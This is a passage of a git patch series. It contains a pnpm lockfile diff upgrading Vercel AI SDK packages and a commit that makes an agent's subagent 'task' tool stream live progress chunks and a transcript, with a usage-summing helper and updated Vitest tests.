     resolution: {integrity: sha512-UycprH3T6n3jH0k44NHMa7pnFHGu/N05MjojYr+Mc6I7obkoLIJujSWwin1pCvdy/eOxrI/l3uDLQsmcrOb4ug==}
     engines: {node: '>= 20'}
@@ -3647,8 +3593,8 @@ packages:
     resolution: {integrity: sha512-kja8j7PjmncONqaTsB8fQ+wE2mSU2DJ9D4XKoJ5PFWIdRMa6SLSN1ff4mOr4jCbfRSsxR4keIiySJU0N9T5hIQ==}
     engines: {node: '>= 8.0.0'}
 
-  ai@6.0.0-beta.122:
-    resolution: {integrity: sha512-Lk8hWSX22eyJBwZvIRY+Bgl8piVB9Jadqv+ine0B2lDJWPg3lsmQac3kSAzGhPBeNeaxm22sHCs9JhuJh3gW5Q==}
+  ai@6.0.190:
+    resolution: {integrity: sha512-T+ixHbWZ6jmHRREpVVJTkFyWJeCekCdzLPan7lp1F32jG5OUw4+odlVYjtMRXVzogU+pWzpMmXdRiHUmdL/q0w==}
     engines: {node: '>=18'}
     peerDependencies:
       zod: ^3.25.76 || ^4.1.8
@@ -4834,6 +4780,10 @@ packages:
     resolution: {integrity: sha512-Vo1ab+QXPzZ4tCa8SwIHJFaSzy4R6SHf7BY79rFBDf0idraZWAkYrDjDj8uWaSm3S2TK+hJ7/t1CEmZ7jXw+pg==}
     engines: {node: '>=18.0.0'}
 
+  eventsource-parser@3.0.8:
+    resolution: {integrity: sha512-70QWGkr4snxr0OXLRWsFLeRBIRPuQOvt4s8QYjmUlmlkyTZkRqS7EDVRZtzU3TiyDbXSzaOeF0XUKy8PchzukQ==}
+    engines: {node: '>=18.0.0'}
+
   eventsource@3.0.7:
     resolution: {integrity: sha512-CRT1WTyuQoD771GW56XEZFQ/ZoSfWid1alKGDYMmkt2yl8UXrVR4pspqWNEcqKvVIzg6PAltWjxcSSPrboA4iA==}
     engines: {node: '>=18.0.0'}
@@ -8173,94 +8123,50 @@ snapshots:
 
   '@adraffy/ens-normalize@1.11.1': {}
 
-  '@ai-sdk/anthropic@3.0.13(zod@4.1.13)':
-    dependencies:
-      '@ai-sdk/provider': 3.0.3
-      '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13)
-      zod: 4.1.13
-
-  '@ai-sdk/gateway@2.0.0-beta.66(zod@4.1.13)':
+  '@ai-sdk/anthropic@3.0.78(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 3.0.0-beta.20
-      '@ai-sdk/provider-utils': 4.0.0-beta.38(zod@4.1.13)
-      '@vercel/oidc': 3.0.5
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
       zod: 4.1.13
-    transitivePeerDependencies:
-      - '@valibot/to-json-schema'
-      - arktype
-      - effect
 
-  '@ai-sdk/gateway@2.0.83(zod@4.1.13)':
+  '@ai-sdk/gateway@3.0.119(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 2.0.2
-      '@ai-sdk/provider-utils': 3.0.24(zod@4.1.13)
-      '@vercel/oidc': 3.1.0
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
+      '@vercel/oidc': 3.2.0
       zod: 4.1.13
 
-  '@ai-sdk/google@3.0.8(zod@4.1.13)':
+  '@ai-sdk/google@3.0.79(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 3.0.3
-      '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13)
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
       zod: 4.1.13
 
-  '@ai-sdk/mcp@0.0.12(zod@4.1.13)':
+  '@ai-sdk/mcp@1.0.43(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 2.0.0
-      '@ai-sdk/provider-utils': 3.0.19(zod@4.1.13)
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
       pkce-challenge: 5.0.1
       zod: 4.1.13
 
-  '@ai-sdk/openai@3.0.10(zod@4.1.13)':
+  '@ai-sdk/openai@3.0.65(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 3.0.3
-      '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13)
-      zod: 4.1.13
-
-  '@ai-sdk/provider-utils@3.0.19(zod@4.1.13)':
-    dependencies:
-      '@ai-sdk/provider': 2.0.0
-      '@standard-schema/spec': 1.1.0
-      eventsource-parser: 3.0.6
-      zod: 4.1.13
-
-  '@ai-sdk/provider-utils@3.0.24(zod@4.1.13)':
-    dependencies:
-      '@ai-sdk/provider': 2.0.2
-      '@standard-schema/spec': 1.1.0
-      eventsource-parser: 3.0.6
-      zod: 4.1.13
-
-  '@ai-sdk/provider-utils@4.0.0-beta.38(zod@4.1.13)':
-    dependencies:
-      '@ai-sdk/provider': 3.0.0-beta.20
-      '@standard-schema/spec': 1.1.0
-      eventsource-parser: 3.0.6
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
       zod: 4.1.13
 
-  '@ai-sdk/provider-utils@4.0.6(zod@4.1.13)':
+  '@ai-sdk/provider-utils@4.0.27(zod@4.1.13)':
     dependencies:
-      '@ai-sdk/provider': 3.0.3
+      '@ai-sdk/provider': 3.0.10
       '@standard-schema/spec': 1.1.0
-      eventsource-parser: 3.0.6
+      eventsource-parser: 3.0.8
       zod: 4.1.13
 
   '@ai-sdk/provider@1.1.3':
     dependencies:
       json-schema: 0.4.0
 
-  '@ai-sdk/provider@2.0.0':
-    dependencies:
-      json-schema: 0.4.0
-
-  '@ai-sdk/provider@2.0.2':
-    dependencies:
-      json-schema: 0.4.0
-
-  '@ai-sdk/provider@3.0.0-beta.20':
-    dependencies:
-      json-schema: 0.4.0
-
-  '@ai-sdk/provider@3.0.3':
+  '@ai-sdk/provider@3.0.10':
     dependencies:
       json-schema: 0.4.0
 
@@ -8716,10 +8622,10 @@ snapshots:
     dependencies:
       zod: 4.1.13
 
-  '@composio/vercel@0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.0-beta.122(zod@4.1.13))':
+  '@composio/vercel@0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.190(zod@4.1.13))':
     dependencies:
       '@composio/core': 0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13)
-      ai: 6.0.0-beta.122(zod@4.1.13)
+      ai: 6.0.190(zod@4.1.13)
 
   '@crawlee/types@3.15.3':
     dependencies:
@@ -11704,7 +11610,7 @@ snapshots:
       - supports-color
       - utf-8-validate
 
-  '@trigger.dev/sdk@4.4.3(ai@6.0.0-beta.122(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)':
+  '@trigger.dev/sdk@4.4.3(ai@6.0.190(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)':
     dependencies:
       '@opentelemetry/api': 1.9.0
       '@opentelemetry/semantic-conventions': 1.36.0
@@ -11720,7 +11626,7 @@ snapshots:
       ws: 8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10)
       zod: 4.1.13
     optionalDependencies:
-      ai: 6.0.0-beta.122(zod@4.1.13)
+      ai: 6.0.190(zod@4.1.13)
     transitivePeerDependencies:
       - bufferutil
       - supports-color
@@ -11989,17 +11895,13 @@ snapshots:
     optionalDependencies:
       '@aws-sdk/credential-provider-web-identity': 3.972.13
 
-  '@vercel/oidc@3.0.5': {}
-
-  '@vercel/oidc@3.1.0': {}
-
   '@vercel/oidc@3.2.0': {}
 
   '@vercel/oidc@3.4.0': {}
 
   '@vercel/queue@0.1.4':
     dependencies:
-      '@vercel/oidc': 3.2.0
+      '@vercel/oidc': 3.4.0
       minimatch: 10.2.5
       mixpart: 0.0.5
       picocolors: 1.1.1
@@ -13093,17 +12995,13 @@ snapshots:
     dependencies:
       humanize-ms: 1.2.1
 
-  ai@6.0.0-beta.122(zod@4.1.13):
+  ai@6.0.190(zod@4.1.13):
     dependencies:
-      '@ai-sdk/gateway': 2.0.0-beta.66(zod@4.1.13)
-      '@ai-sdk/provider': 3.0.0-beta.20
-      '@ai-sdk/provider-utils': 4.0.0-beta.38(zod@4.1.13)
+      '@ai-sdk/gateway': 3.0.119(zod@4.1.13)
+      '@ai-sdk/provider': 3.0.10
+      '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13)
       '@opentelemetry/api': 1.9.0
       zod: 4.1.13
-    transitivePeerDependencies:
-      - '@valibot/to-json-schema'
-      - arktype
-      - effect
 
   ajv-formats@3.0.1(ajv@8.17.1):
     optionalDependencies:
@@ -14589,6 +14487,8 @@ snapshots:
 
   eventsource-parser@3.0.6: {}
 
+  eventsource-parser@3.0.8: {}
+
   eventsource@3.0.7:
     dependencies:
       eventsource-parser: 3.0.6

From 386c4ee232107b75665e24377aad108b674e440a Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 19:20:20 -0500
Subject: [PATCH 08/10] feat(task-tool): live subagent progress + transcript
 (Cutover Bundle B) (#594)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Convert taskTool.execute from `async () =>` to `async function*`,
mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple
chunks during the subagent run so the chat UI can render:

  - An initial "Subagent · 0 tools · 0 tokens" card with stable
    startedAt timestamp
  - A live `pending: {name, input}` indicator for each tool-call
  - Accumulated `usage` after each finish-step
  - A final `{final: ModelMessage[], ...}` chunk containing the full
    subagent transcript for expandable rendering

`toModelOutput` mirrors open-agents' implementation: extracts the
last assistant text part from `output.final` for inclusion in the
parent agent's context.

New (SRP, one function per file):
- lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps
  addLanguageModelUsage to handle undefined inputs without
  introducing zero-tokens placeholders.

Drive-by fix: askUserQuestionTool's `toModelOutput` signature was
`(output) =>` from the older beta SDK era. The current SDK
(ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to
`({ output }) =>` so the function actually receives the user's
answers at runtime — was previously falling through to the generic
"User responded to questions." path. Tests updated to match.

Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9
askUserQuestion); full suite 3114/3114 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .../__tests__/sumLanguageModelUsage.test.ts   |  27 ++
 .../messageMetadata/sumLanguageModelUsage.ts  |  21 ++
 .../__tests__/askUserQuestionTool.test.ts     |  14 +-
 lib/agent/tools/__tests__/taskTool.test.ts    | 273 ++++++++++++------
 lib/agent/tools/askUserQuestionTool.ts        |   2 +-
 lib/agent/tools/taskTool.ts                   | 155 ++++++----
 6 files changed, 343 insertions(+), 149 deletions(-)
 create mode 100644 lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts
 create mode 100644 lib/agent/messageMetadata/sumLanguageModelUsage.ts

diff --git a/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts b/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts
new file mode 100644
index 000000000..403bbe5ab
--- /dev/null
+++ b/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts
@@ -0,0 +1,27 @@
+import { describe, it, expect } from "vitest";
+import { sumLanguageModelUsage } from "@/lib/agent/messageMetadata/sumLanguageModelUsage";
+
+describe("sumLanguageModelUsage", () => {
+  it("returns undefined when both inputs are undefined", () => {
+    expect(sumLanguageModelUsage(undefined, undefined)).toBeUndefined();
+  });
+
+  it("returns the second input when first is undefined", () => {
+    const u = { inputTokens: 100, outputTokens: 50 };
+    expect(sumLanguageModelUsage(undefined, u as never)).toBe(u);
+  });
+
+  it("returns the first input when second is undefined", () => {
+    const u = { inputTokens: 100, outputTokens: 50 };
+    expect(sumLanguageModelUsage(u as never, undefined)).toBe(u);
+  });
+
+  it("sums the two inputs pointwise when both are present", () => {
+    const result = sumLanguageModelUsage(
+      { inputTokens: 100, outputTokens: 50 } as never,
+      { inputTokens: 200, outputTokens: 75 } as never,
+    );
+    expect(result?.inputTokens).toBe(300);
+    expect(result?.outputTokens).toBe(125);
+  });
+});
diff --git a/lib/agent/messageMetadata/sumLanguageModelUsage.ts b/lib/agent/messageMetadata/sumLanguageModelUsage.ts
new file mode 100644
index 000000000..2f400f33b
--- /dev/null
+++ b/lib/agent/messageMetadata/sumLanguageModelUsage.ts
@@ -0,0 +1,21 @@
+import type { LanguageModelUsage } from "ai";
+import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage";
+
+/**
+ * Sum two optional `LanguageModelUsage` records. Returns the sum when
+ * both are defined, the defined one when only one is, or `undefined`
+ * when neither is. Mirrors open-agents' `sumLanguageModelUsage` in
+ * `packages/agent/usage.ts`.
+ *
+ * Used by the `task` tool's progress streaming to accumulate usage
+ * across subagent steps without introducing zero-tokens placeholders
+ * before the first step finishes.
+ */
+export function sumLanguageModelUsage(
+  a: LanguageModelUsage | undefined,
+  b: LanguageModelUsage | undefined,
+): LanguageModelUsage | undefined {
+  if (!a) return b;
+  if (!b) return a;
+  return addLanguageModelUsage(a, b);
+}
diff --git a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts
index ee55e6305..79995551a 100644
--- a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts
+++ b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts
@@ -81,14 +81,16 @@ describe("askUserQuestionTool — server-side wiring", () => {
 
 describe("askUserQuestionTool.toModelOutput", () => {
   it("returns a generic message when no output is present", () => {
-    expect(askUserQuestionTool.toModelOutput!(undefined as never)).toEqual({
+    expect(askUserQuestionTool.toModelOutput!({ output: undefined } as never)).toEqual({
       type: "text",
       value: "User did not respond to questions.",
     });
   });
 
   it("formats `declined: true` as a clear decline message", () => {
-    const result = askUserQuestionTool.toModelOutput!({ declined: true } as never);
+    const result = askUserQuestionTool.toModelOutput!({
+      output: { declined: true },
+    } as never);
     expect(result).toMatchObject({
       type: "text",
       value: expect.stringMatching(/declined to answer/i),
@@ -97,9 +99,11 @@ describe("askUserQuestionTool.toModelOutput", () => {
 
   it("formats answered questions as a parseable Q=A summary", () => {
     const result = askUserQuestionTool.toModelOutput!({
-      answers: {
-        "Which model do you want?": "Haiku",
-        "Which features?": ["Streaming", "Tools"],
+      output: {
+        answers: {
+          "Which model do you want?": "Haiku",
+          "Which features?": ["Streaming", "Tools"],
+        },
       },
     } as never);
     expect(result).toMatchObject({
diff --git a/lib/agent/tools/__tests__/taskTool.test.ts b/lib/agent/tools/__tests__/taskTool.test.ts
index 609037918..8e876afdb 100644
--- a/lib/agent/tools/__tests__/taskTool.test.ts
+++ b/lib/agent/tools/__tests__/taskTool.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect, vi, beforeEach } from "vitest";
-import { taskTool } from "@/lib/agent/tools/taskTool";
+import { taskTool, type TaskToolOutput } from "@/lib/agent/tools/taskTool";
 import { streamText } from "ai";
 import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
 
@@ -12,79 +12,176 @@ vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
   connectVercel: vi.fn(),
 }));
 
-// `model` is normally attached by `runAgentStep` before the subagent
-// sees the context. The opaque sentinel below is enough for taskTool
-// to pass it into `streamText` — we assert the same instance flows
-// through.
-const mainModel = { __sentinel: "main-model" } as never;
-const subagentModelOverride = { __sentinel: "subagent-model" } as never;
+const mainModel = { modelId: "anthropic/claude-haiku-4.5" } as never;
+const subagentModelOverride = { modelId: "anthropic/claude-sonnet-4.6" } as never;
 const ctx = {
   sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
   model: mainModel,
 };
 
-function makeStreamTextResult(finalText: string) {
+function makeStreamResult(opts: {
+  toolCalls?: Array<{ toolName: string; input: unknown }>;
+  finishSteps?: number;
+  responseMessages?: Array<{ role: string; content: unknown }>;
+  totalUsage?: unknown;
+}) {
+  const calls = opts.toolCalls ?? [];
+  const finishCount = opts.finishSteps ?? 1;
   return {
     fullStream: (async function* () {
-      // empty — execute only awaits `result.finishReason` + result.response
+      for (const c of calls) {
+        yield { type: "tool-call", toolName: c.toolName, input: c.input };
+      }
+      for (let i = 0; i < finishCount; i++) {
+        yield {
+          type: "finish-step",
+          usage: { inputTokens: 100, outputTokens: 25, totalTokens: 125 },
+        };
+      }
     })(),
+    response: Promise.resolve({ messages: opts.responseMessages ?? [] }),
+    totalUsage: Promise.resolve(opts.totalUsage ?? { inputTokens: 0, outputTokens: 0 }),
     finishReason: Promise.resolve("stop"),
-    response: Promise.resolve({
-      messages: [
-        {
-          role: "assistant",
-          content: [{ type: "text", text: finalText }],
-        },
-      ],
-    }),
   };
 }
 
+async function drainGenerator<T>(gen: AsyncGenerator<T> | AsyncIterable<T>): Promise<T[]> {
+  const out: T[] = [];
+  for await (const chunk of gen) out.push(chunk);
+  return out;
+}
+
 beforeEach(() => {
   vi.clearAllMocks();
   vi.mocked(connectVercel).mockResolvedValue({ workingDirectory: "/sandbox/mono" } as never);
 });
 
-describe("taskTool.execute", () => {
-  it("runs a sub-streamText with the subagent system prompt + task + instructions", async () => {
-    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("Task done.") as never);
-    const result = (await taskTool.execute!(
-      { task: "Find the largest .ts file", instructions: "Use glob and stat to find it" },
-      { experimental_context: ctx } as never,
-    )) as { success: boolean; summary: string };
-    expect(result.success).toBe(true);
-    expect(result.summary).toBe("Task done.");
-    const args = vi.mocked(streamText).mock.calls[0]?.[0] as Record<string, unknown>;
-    // system prompt contains task + instructions so the subagent knows its scope
-    expect(args.system).toEqual(expect.stringContaining("Find the largest .ts file"));
-    expect(args.system).toEqual(expect.stringContaining("Use glob and stat"));
+describe("taskTool.execute (async generator)", () => {
+  it("yields an initial chunk with toolCallCount=0 + startedAt + modelId before the subagent does any work", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never);
+    const gen = taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never) as AsyncGenerator<TaskToolOutput>;
+    const first = await gen.next();
+    expect(first.done).toBe(false);
+    expect(first.value).toMatchObject({
+      toolCallCount: 0,
+      modelId: "anthropic/claude-haiku-4.5",
+    });
+    expect(first.value.startedAt).toBeTypeOf("number");
+    // Drain to finish.
+    await drainGenerator(gen);
   });
 
-  it("registers only the executor tool set (no recursion, no task/ask/skill/todo/fetch)", async () => {
-    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
-    await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: ctx,
-    } as never);
+  it("emits a `pending` chunk with name + input on every tool-call", async () => {
+    vi.mocked(streamText).mockReturnValue(
+      makeStreamResult({
+        toolCalls: [
+          { toolName: "bash", input: { command: "ls" } },
+          { toolName: "read", input: { path: "/foo" } },
+        ],
+        finishSteps: 1,
+        responseMessages: [{ role: "assistant", content: [{ type: "text", text: "done" }] }],
+      }) as never,
+    );
+    const chunks = (await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: ctx,
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    )) as TaskToolOutput[];
+    // Two tool-call yields + one finish-step yield (sticky pending so the
+    // UI doesn't flicker back to an initializing state between steps).
+    const pendingChunks = chunks.filter(c => c.pending);
+    expect(pendingChunks).toHaveLength(3);
+    expect(pendingChunks[0]?.pending).toEqual({ name: "bash", input: { command: "ls" } });
+    expect(pendingChunks[0]?.toolCallCount).toBe(1);
+    expect(pendingChunks[1]?.pending).toEqual({ name: "read", input: { path: "/foo" } });
+    expect(pendingChunks[1]?.toolCallCount).toBe(2);
+    // Finish-step keeps the most recent pending sticky.
+    expect(pendingChunks[2]?.pending).toEqual({ name: "read", input: { path: "/foo" } });
+  });
+
+  it("accumulates usage across finish-step parts", async () => {
+    vi.mocked(streamText).mockReturnValue(
+      makeStreamResult({
+        finishSteps: 2,
+        responseMessages: [{ role: "assistant", content: [{ type: "text", text: "ok" }] }],
+      }) as never,
+    );
+    const chunks = (await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: ctx,
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    )) as TaskToolOutput[];
+    const usageChunks = chunks.filter(c => c.usage);
+    // 2 finish-step yields + 1 final yield = 3 chunks carrying usage
+    expect(usageChunks.length).toBeGreaterThanOrEqual(2);
+    const last = usageChunks[usageChunks.length - 1]!;
+    expect(last.usage).toMatchObject({ inputTokens: 200, outputTokens: 50 });
+  });
+
+  it("emits a final chunk containing the subagent's full response.messages transcript", async () => {
+    const responseMessages = [
+      { role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] },
+      { role: "tool", content: [{ type: "tool-result", output: "..." }] },
+      { role: "assistant", content: [{ type: "text", text: "Done." }] },
+    ];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ responseMessages }) as never);
+    const chunks = (await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: ctx,
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    )) as TaskToolOutput[];
+    const finalChunk = chunks.find(c => c.final);
+    expect(finalChunk).toBeDefined();
+    expect(finalChunk!.final).toEqual(responseMessages);
+    expect(finalChunk!.toolCallCount).toBe(0);
+    expect(finalChunk!.usage).toBeDefined();
+  });
+
+  it("uses the subagentModel override when set on the agent context", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never);
+    await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: { ...ctx, subagentModel: subagentModelOverride },
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    );
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown };
+    expect(args.model).toBe(subagentModelOverride);
+  });
+
+  it("throws when agent context is missing the `model` field", async () => {
+    const gen = taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: { sandbox: ctx.sandbox /* no model */ },
+    } as never) as AsyncGenerator<TaskToolOutput>;
+    await expect(gen.next()).rejects.toThrow(/model not initialized/i);
+  });
+
+  it("registers only the executor tool set on the inner streamText call", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never);
+    await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: ctx,
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    );
     const args = vi.mocked(streamText).mock.calls[0]?.[0] as { tools: Record<string, unknown> };
-    const toolNames = Object.keys(args.tools).sort();
-    expect(toolNames).toEqual(["bash", "edit", "glob", "grep", "read", "write"]);
-    // Critical: NO task (recursion guard) and NO client-side tools.
-    expect(args.tools).not.toHaveProperty("task");
-    expect(args.tools).not.toHaveProperty("ask_user_question");
-    expect(args.tools).not.toHaveProperty("skill");
-    expect(args.tools).not.toHaveProperty("todo_write");
-    expect(args.tools).not.toHaveProperty("web_fetch");
+    expect(Object.keys(args.tools).sort()).toEqual([
+      "bash",
+      "edit",
+      "glob",
+      "grep",
+      "read",
+      "write",
+    ]);
   });
 
-  it("passes a non-empty prompt so the model has something to act on", async () => {
-    // Regression: a previous version called streamText with `messages: []`,
-    // which caused the AI SDK to throw NoOutputGeneratedError because zero
-    // steps were recorded — the model had a system prompt but no user turn
-    // to respond to. The subagent must receive an explicit user-side trigger.
-    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
-    await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: ctx,
-    } as never);
+  it("passes a non-empty prompt so the model has something to act on (NoOutputGeneratedError regression)", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never);
+    await drainGenerator(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: ctx,
+      } as never) as AsyncGenerator<TaskToolOutput>,
+    );
     const args = vi.mocked(streamText).mock.calls[0]?.[0] as {
       prompt?: string;
       messages?: unknown[];
@@ -93,54 +190,46 @@ describe("taskTool.execute", () => {
     const hasMessages = Array.isArray(args.messages) && args.messages.length > 0;
     expect(hasPrompt || hasMessages).toBe(true);
   });
+});
 
-  it("inherits the parent's `model` from agent context when no subagentModel override is set", async () => {
-    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
-    await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: ctx,
-    } as never);
-    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown };
-    expect(args.model).toBe(mainModel);
+describe("taskTool.toModelOutput", () => {
+  it("returns 'Task completed.' when no `final` is present", () => {
+    const out = taskTool.toModelOutput!({ output: {} } as never);
+    expect(out).toEqual({ type: "text", value: "Task completed." });
   });
 
-  it("prefers `subagentModel` over `model` when both are set on the context", async () => {
-    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
-    await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: { ...ctx, subagentModel: subagentModelOverride },
+  it("extracts the last assistant text part from the transcript", () => {
+    const out = taskTool.toModelOutput!({
+      output: {
+        final: [
+          { role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] },
+          { role: "tool", content: [{ type: "tool-result" }] },
+          {
+            role: "assistant",
+            content: [
+              { type: "tool-call", toolName: "read" },
+              { type: "text", text: "Found 3 files." },
+            ],
+          },
+        ],
+      },
     } as never);
-    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown };
-    expect(args.model).toBe(subagentModelOverride);
+    expect(out).toEqual({ type: "text", value: "Found 3 files." });
   });
 
-  it("returns success:false when no assistant text is in the response", async () => {
-    vi.mocked(streamText).mockReturnValue({
-      fullStream: (async function* () {})(),
-      finishReason: Promise.resolve("stop"),
-      response: Promise.resolve({ messages: [] }),
+  it("handles a string-valued content directly", () => {
+    const out = taskTool.toModelOutput!({
+      output: { final: [{ role: "assistant", content: "plain text reply" }] },
     } as never);
-    const result = (await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: ctx,
-    } as never)) as { success: boolean; summary: string };
-    expect(result.success).toBe(false);
-    expect(result.summary).toMatch(/no.*assistant/i);
-  });
-
-  it("returns success:false with a descriptive error when streamText throws", async () => {
-    vi.mocked(streamText).mockImplementation(() => {
-      throw new Error("gateway down");
-    });
-    const result = (await taskTool.execute!({ task: "x", instructions: "y" }, {
-      experimental_context: ctx,
-    } as never)) as { success: boolean; error: string };
-    expect(result.success).toBe(false);
-    expect(result.error).toMatch(/gateway down/);
+    expect(out).toEqual({ type: "text", value: "plain text reply" });
   });
 
-  it("throws when agent context is missing the `model` field", async () => {
-    await expect(
-      taskTool.execute!({ task: "x", instructions: "y" }, {
-        experimental_context: { sandbox: ctx.sandbox /* no model */ },
-      } as never),
-    ).rejects.toThrow(/model not initialized/i);
+  it("falls back to 'Task completed.' when the last assistant message has no text parts", () => {
+    const out = taskTool.toModelOutput!({
+      output: {
+        final: [{ role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] }],
+      },
+    } as never);
+    expect(out).toEqual({ type: "text", value: "Task completed." });
   });
 });
diff --git a/lib/agent/tools/askUserQuestionTool.ts b/lib/agent/tools/askUserQuestionTool.ts
index 8d5e1f4ed..1e15b27f4 100644
--- a/lib/agent/tools/askUserQuestionTool.ts
+++ b/lib/agent/tools/askUserQuestionTool.ts
@@ -57,7 +57,7 @@ Usage notes:
   outputSchema: askUserQuestionOutputSchema,
   // NO execute: this is a client-side tool. streamText halts the run after
   // emitting the tool-call; the chat UI fulfills it asynchronously.
-  toModelOutput: output => {
+  toModelOutput: ({ output }) => {
     if (!output) {
       return { type: "text", value: "User did not respond to questions." };
     }
diff --git a/lib/agent/tools/taskTool.ts b/lib/agent/tools/taskTool.ts
index 83381d58f..270974fce 100644
--- a/lib/agent/tools/taskTool.ts
+++ b/lib/agent/tools/taskTool.ts
@@ -1,7 +1,8 @@
-import { streamText, stepCountIs, tool } from "ai";
+import { streamText, stepCountIs, tool, type LanguageModelUsage, type ModelMessage } from "ai";
 import { z } from "zod";
 import { buildSubagentTools } from "@/lib/agent/tools/buildSubagentTools";
 import { getSubagentModel } from "@/lib/agent/tools/getSubagentModel";
+import { sumLanguageModelUsage } from "@/lib/agent/messageMetadata/sumLanguageModelUsage";
 
 const SUBAGENT_STEP_LIMIT = 30;
 
@@ -20,6 +21,32 @@ const taskInputSchema = z.object({
     ),
 });
 
+const taskPendingToolCallSchema = z.object({
+  name: z.string(),
+  input: z.unknown(),
+});
+
+export type TaskPendingToolCall = z.infer<typeof taskPendingToolCallSchema>;
+
+/**
+ * Output schema mirrors open-agents' `taskOutputSchema`
+ * (`packages/agent/tools/task.ts`) so the chat UI can render the same
+ * live progress card and expandable subagent transcript when cut over
+ * to api's `/api/chat/workflow`. The `execute` is an async generator
+ * that yields multiple chunks during the subagent run; the AI SDK
+ * pipes each yield through `tool-output-available`.
+ */
+const taskOutputSchema = z.object({
+  pending: taskPendingToolCallSchema.optional(),
+  toolCallCount: z.number().int().nonnegative().optional(),
+  startedAt: z.number().int().nonnegative().optional(),
+  modelId: z.string().optional(),
+  final: z.custom<ModelMessage[]>().optional(),
+  usage: z.custom<LanguageModelUsage>().optional(),
+});
+
+export type TaskToolOutput = z.infer<typeof taskOutputSchema>;
+
 const SUBAGENT_SYSTEM_PROMPT = `You are a focused subagent invoked by a parent agent. Run autonomously — do not ask the user clarifying questions. Complete the delegated task using the tools you have, then return a concise summary of what you did.
 
 Constraints:
